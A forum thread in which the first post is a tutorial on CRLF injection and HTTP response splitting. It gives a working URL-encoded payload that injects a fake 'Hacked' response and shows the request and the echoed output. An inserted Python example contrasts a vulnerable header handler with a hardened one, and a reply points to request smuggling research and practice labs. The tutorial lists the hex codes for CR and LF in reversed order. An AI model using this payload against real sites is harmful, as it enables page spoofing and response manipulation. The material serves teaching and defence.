CRLF Injection - Manipulating an HTTP Request
#1

Credits: RootTheSystem @ IntoSec

What Does CRLF Mean? It's short for "Carriage Return and Line Feed". These are the names of the characters we're going to inject.

Code:

Carriage Return -> \r
Line Feed (New Line) -> \n

Looks familiar right?
Every time we press the Enter/Return key on our keyboard, these characters are sent to the processor to move to a new line.

Extra Information: The equivalents of these characters in hexadecimal are 0A and 0D.

Exploitation
Now let's look at an HTTP request.

Code:
GET http://www.tiggerwigger.com/index.php?param=val HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Host: www.tiggerwigger.com
This is a simple HTTP request using the GET method. We have a parameter that we can manipulate.

http://www.tiggerwigger.com/index.php?param=val

So if life gives us lemons, we'll make a lemonade.
Let's manipulate that piece of shit.

We'll inject a web response using CRLF characters, so the server will echo back our response. Then our web browser will treat it as an actual response and show our index. Confused? Let me give you an example.

Let's add our exploit to URL and see what happens.

http://www.tiggerwigger.com/index.php?param=val%0D%0AContent-Type:%20text/html%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0A%0D%0A<center><h1>Hacked</h1></center>%20HTTP/1.1

Now our request will look like this:
Code:
GET http://www.tiggerwigger.com/index.php?param=val%0D%0AContent-Type:%20text/html%0D%0AHTTP/1.1%20200%20OK%0D%0A
Content-Type:%20text/html%0D%0A%0D%0A<center><h1>Hacked</h1></center>%20HTTP/1.1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Host: www.tiggerwigger.com

And the server echoes it back to us...
Code:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Wed, 01 Jun 2011 14:59:30 GMT
Allow: GET
Connection: close

HTTP/1.1 200 OK
Content-Type: text/html

<center><h1>Hacked</h1></center> HTTP/1.1

Our browser treated our injected response like an actual response and BAM! Our index appeared in the page.

More info: https://owasp.org/www-community/vulnerab..._Injection
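As an added example (not part of the original post or its credited author's material), here is the splitting effect and its fix in Python: a naive handler that echoes the parameter into a response header, a hardened handler that refuses CR/LF in header values, and a check that counts how many HTTP status lines the resulting bytes contain. The function names and the constructed payload (built from the URL above) are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Constructed input: the percent-decoded value of "param" from the URL above.
CONSTRUCTED_PAYLOAD = unquote(
    "val%0D%0AContent-Type:%20text/html%0D%0AHTTP/1.1%20200%20OK%0D%0A"
    "Content-Type:%20text/html%0D%0A%0D%0A<center><h1>Hacked</h1></center>"
)


def header_value_is_safe(value: str) -> bool:
    """A header value may never contain a bare CR or LF."""
    return "\r" not in value and "\n" not in value


def build_response_vulnerable(param: str) -> str:
    """Naive handler: concatenates the parameter straight into a header.

    Any CRLF inside 'param' terminates the header line early, so the
    rest of the input is emitted as further headers, a blank line and a
    body, exactly as in the echoed response shown in the post.
    """
    return (
        "HTTP/1.1 200 OK\r\n"
        "X-Param: " + param + "\r\n"
        "Content-Type: text/plain\r\n"
        "\r\n"
        "ok"
    )


def build_response_hardened(param: str) -> str:
    """Hardened handler: rejects the request instead of emitting CR/LF."""
    if not header_value_is_safe(param):
        return (
            "HTTP/1.1 400 Bad Request\r\n"
            "Content-Type: text/plain\r\n"
            "\r\n"
            "header value contains CR or LF"
        )
    return build_response_vulnerable(param)


def count_responses(raw: str) -> int:
    """Count status lines at the start of a line: more than one means the
    output has been split into several HTTP responses."""
    return len(re.findall(r"(?m)^HTTP/1\.[01] \d{3}", raw))
```

Modern HTTP libraries and frameworks apply the same rule and raise on CR/LF in header values, which is why this attack mostly surfaces today in hand-rolled or legacy code.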
#2
This is a pretty rare attack, it died out like a decade ago. Though, request smuggling (something enabled by CRLF injection) has seen a revival in the past year, in the form of HTTP Desync attacks, presented at last year's Defcon and Blackhat conferences.

If you're looking for a more modern attack that can be used to do something similar, check it out.

- Defcon presentation: https://www.youtube.com/watch?v=w-eJM2Pc0KI
- Blackhat Slides: https://i.blackhat.com/USA-19/Wednesday/...t-Door.pdf
- Portswigger Academy Labs: https://portswigger.net/web-security/request-smuggling